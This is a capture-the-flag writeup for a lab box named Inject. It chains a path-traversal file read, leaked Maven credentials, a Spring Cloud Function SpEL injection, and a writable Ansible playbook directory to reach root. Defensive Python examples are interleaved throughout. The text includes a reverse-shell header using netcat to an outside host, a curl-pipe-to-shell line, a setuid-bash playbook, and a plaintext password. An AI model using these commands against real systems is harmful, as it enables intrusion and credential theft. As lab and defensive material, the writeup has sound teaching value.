Inject

Recon

nmap_scan.log

HTTP (8080)


Two users are listed on /blog, admin and Brandon Auger, but none of the posts are readable.


http://10.129.228.213:8080/upload accepts only images, so upload a valid one. You get redirected to http://10.129.228.213:8080/show_image?img=kraken.png

LFI is possible through the img parameter.


Oddly enough, the vulnerable endpoint also returns directory listings, so you can navigate the filesystem.

└─$ curl 'http://10.129.228.213:8080/show_image?img=../resources/application.properties'
server.tomcat.relaxed-query-chars=|,{,},[,]
server.error.whitelabel.enabled=false
spring.main.allow-circular-references=true
spring.servlet.multipart.max-file-size=1MB
spring.servlet.multipart.max-request-size=2MB
spring.cloud.config.uri=
spring.cloud.config.allow-override=true
debug=false
server.error.include-message=always
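The root cause is the show_image handler joining the user-supplied img value onto its base directory. Below, as an added example (not the WebApp's code), the vulnerable pattern sits beside a hardened resolver that canonicalises the path, checks containment, refuses directories and only serves image suffixes; the upload directory path is an assumption, since the writeup never shows it.

```python
import os

# Assumed upload directory (placeholder): the writeup does not show where the app stores images.
UPLOAD_DIR = "/var/www/WebApp/uploads"
ALLOWED_SUFFIXES = (".png", ".jpg", ".jpeg", ".gif")

def resolve_image_vulnerable(img, base=UPLOAD_DIR):
    """The pattern behind the LFI: the request value is joined straight onto the base directory."""
    return os.path.normpath(os.path.join(base, img))

def resolve_image(img, base=UPLOAD_DIR):
    """Hardened lookup for ?img=...: returns the path to serve, or None to reject with a 404.

    Canonicalises (symlinks included) and then checks containment with commonpath,
    which also defeats prefix tricks such as /var/www/WebApp/uploads-old.
    """
    if not img or "\x00" in img or os.path.isabs(img):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, img))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None          # escaped the upload directory (../ traversal)
    if candidate == base_real or os.path.isdir(candidate):
        return None          # never hand out directory listings
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None          # application.properties, settings.xml, pom.xml are not images
    return candidate

if __name__ == "__main__":
    # Constructed requests, taken from the traversal attempts shown in this writeup
    for req in ("kraken.png", "../resources/application.properties",
                "../../../../../../../home/frank/.m2/settings.xml"):
        print(f"{req!r:60} vulnerable -> {resolve_image_vulnerable(req)}")
        print(f"{'':60} hardened   -> {resolve_image(req)}")
```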

We can also enumerate users, and this WebApp appears to run as frank, because we have read access to his files.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Password doesn't work on SSH.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.6.5</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.example</groupId>
        <artifactId>WebApp</artifactId>
        <version>0.0.1-SNAPSHOT</version>
        <name>WebApp</name>
        <description>Demo project for Spring Boot</description>
        <properties>
                <java.version>11</java.version>
        </properties>
        <dependencies>
                <dependency>
                        <groupId>com.sun.activation</groupId>
                        <artifactId>javax.activation</artifactId>
                        <version>1.2.0</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-devtools</artifactId>
                        <scope>runtime</scope>
                        <optional>true</optional>
                </dependency>

                <dependency>
                        <groupId>org.springframework.cloud</groupId>
                        <artifactId>spring-cloud-function-web</artifactId>
                        <version>3.2.2</version>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-test</artifactId>
                        <scope>test</scope>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>bootstrap</artifactId>
                        <version>5.1.3</version>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>webjars-locator-core</artifactId>
                </dependency>

        </dependencies>
        <build>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
                                <version>${parent.version}</version>
                        </plugin>
                </plugins>
                <finalName>spring-webapp</finalName>
        </build>
</project>
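An added example (not part of the writeup or the WebApp project) that reads the pom.xml above and flags the two coordinates sitting in known-vulnerable ranges; the fixed versions are the ones from the Spring advisories for these CVEs, and the embedded pom is a trimmed copy of the one shown.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://maven.apache.org/POM/4.0.0}"

# (groupId, artifactId) -> (CVE, fixed versions per release line).
# CVE-2022-22965 only marks an affected version: exploitability also depends on the
# deployment (JDK 9+, WAR packaging on Tomcat, ...), which is why the PoC can fail.
ADVISORIES = {
    ("org.springframework.cloud", "spring-cloud-function-web"): ("CVE-2022-22963", ("3.1.7", "3.2.3")),
    ("org.springframework.boot", "spring-boot-starter-parent"): ("CVE-2022-22965", ("2.5.12", "2.6.6")),
}

def parse_version(v):
    """'2.6.5' -> (2, 6, 5); tolerates suffixes such as '0.0.1-SNAPSHOT'."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])

def is_fixed(version, fixed):
    v = parse_version(version)
    for f in fixed:
        fv = parse_version(f)
        if v[:2] == fv[:2]:          # same release line: fixed from this patch level on
            return v >= fv
    return v > max(parse_version(f) for f in fixed)   # newer line than any fix, else too old

def audit_pom(pom_xml):
    """Return [(groupId:artifactId, version, CVE)] for every coordinate in a known-vulnerable range."""
    root = ET.fromstring(pom_xml)
    findings = []
    coords = [root.find(NS + "parent")] + root.findall(f"{NS}dependencies/{NS}dependency")
    for dep in coords:
        if dep is None:
            continue
        key = (dep.findtext(NS + "groupId"), dep.findtext(NS + "artifactId"))
        version = dep.findtext(NS + "version")
        if key in ADVISORIES and version and not version.startswith("${"):
            cve, fixed = ADVISORIES[key]
            if not is_fixed(version, fixed):
                findings.append((":".join(key), version, cve))
    return findings

# Constructed sample: the relevant coordinates from the WebApp pom.xml above.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <parent><groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId><version>2.6.5</version></parent>
  <dependencies>
    <dependency><groupId>org.springframework.cloud</groupId>
      <artifactId>spring-cloud-function-web</artifactId><version>3.2.2</version></dependency>
    <dependency><groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId></dependency>
  </dependencies>
</project>"""

if __name__ == "__main__":
    for coord, version, cve in audit_pom(SAMPLE_POM):
        print(f"{coord} {version}: in affected range for {cve}")
```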

CVE-2022-22965: the Docker PoC for CVE-2022-22965 against Spring Boot 2.6.5 doesn't work.

CVE-2022-22963 PoC (SpEL injection through the spring.cloud.function.routing-expression header; the pom pulls in spring-cloud-function-web 3.2.2) works:

└─$ curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("busybox nc 10.10.14.42 4444 -e /bin/bash")' -d '' http://10.129.228.213:8080/functionRouter -s | jq .
script /dev/null -qc /bin/bash
frank@inject:~$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
frank@inject:~$ su - phil
su - phil
Password: DocPhillovestoInject123

phil@inject:~$ id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

The password didn't work over SSH but works locally, which suggests SSH has password authentication disabled.

SSH

Upgrade to SSH

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken
---
phil@inject:~/.ssh$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken' > ~/.ssh/authorized_keys

Still doesn't work, check SSH configuration:

phil@inject:~/.ssh$ grep -E '^DenyUsers|^DenyGroups' /etc/ssh/sshd_config
DenyUsers phil

Only the phil user is denied access... so we could SSH in as frank and then elevate to phil.

User.txt

phil@inject:~$ cat user.txt
663a15ed16a9c6f45bcb6aa7c78fa3dc

Privilege Escalation

phil@inject:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.log
				╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
...
root         916  0.0  0.0   6816  2928 ?        Ss   19:56   0:00 /usr/sbin/cron -f
root        8850  0.1  0.0   8356  3332 ?        S    21:06   0:00  _ /usr/sbin/CRON -f
root        8853  0.0  0.0   2608   596 ?        Ss   21:06   0:00      _ /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
root        8856  0.0  0.0   5476   516 ?        S    21:06   0:00          _ sleep 10
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/782
/tmp/lp.log
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
...

phil@inject:/opt/automation/tasks$ cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

There's some Ansible cron job that probably runs the playbooks in this directory and then removes them.

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/

phil@inject:/opt/automation/tasks$ nano letmein.yml
phil@inject:/opt/automation/tasks$ cat letmein.yml
- hosts: localhost
  tasks:
    - name: RShell
      command: install -m4777 /bin/bash /tmp/rootbash

After ~10 seconds:

phil@inject:/opt/automation/tasks$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(phil) gid=1001(phil) euid=0(root) groups=1001(phil),50(staff)
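The defender's check for the pattern that made this work (a root cron job executing whatever playbooks land in a directory a non-root group can write to), as an added example that is not from the writeup: it inspects the tasks directory and its playbooks and flags anything a non-root principal can modify. The sample directory it builds is constructed, and gid 50 in the comments is the staff group from the id output above.

```python
import os
import stat
import tempfile

PLAYBOOK_DIR = "/opt/automation/tasks"   # directory the root cron job refills and ansible-playbook consumes

def perm_issues(path, mode, uid, gid):
    """Findings for one path, given its permission bits and owner.
    Any write access for a non-root principal means root code execution once the playbook runs."""
    issues = []
    if uid != 0:
        issues.append(f"{path}: owned by uid {uid}, not root")
    if mode & stat.S_IWGRP and gid != 0:          # e.g. root:staff (gid 50) with mode 770
        issues.append(f"{path}: group-writable by non-root gid {gid}")
    if mode & stat.S_IWOTH:
        issues.append(f"{path}: world-writable")
    return issues

def audit_playbook_dir(path=PLAYBOOK_DIR):
    """Check the directory itself and every playbook in it.
    A writable directory is as bad as a writable playbook: new files get picked up too."""
    def check(p):
        st = os.lstat(p)
        return perm_issues(p, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    findings = check(path)
    for name in sorted(os.listdir(path)):
        if name.endswith((".yml", ".yaml")):
            findings += check(os.path.join(path, name))
    return findings

def make_demo_dir():
    """Constructed sample: the box's layout with deliberately loose modes, so this runs offline."""
    d = tempfile.mkdtemp(prefix="tasks_")
    os.chmod(d, 0o777)
    pb = os.path.join(d, "playbook_1.yml")
    with open(pb, "w") as fh:
        fh.write("- hosts: localhost\n  tasks: []\n")
    os.chmod(pb, 0o666)
    return d

if __name__ == "__main__":
    target = PLAYBOOK_DIR if os.path.isdir(PLAYBOOK_DIR) else make_demo_dir()
    for line in audit_playbook_dir(target) or [f"{target}: no findings"]:
        print(line)
```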

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
67f5ef862b1bfe0af73e7dbc60475e72
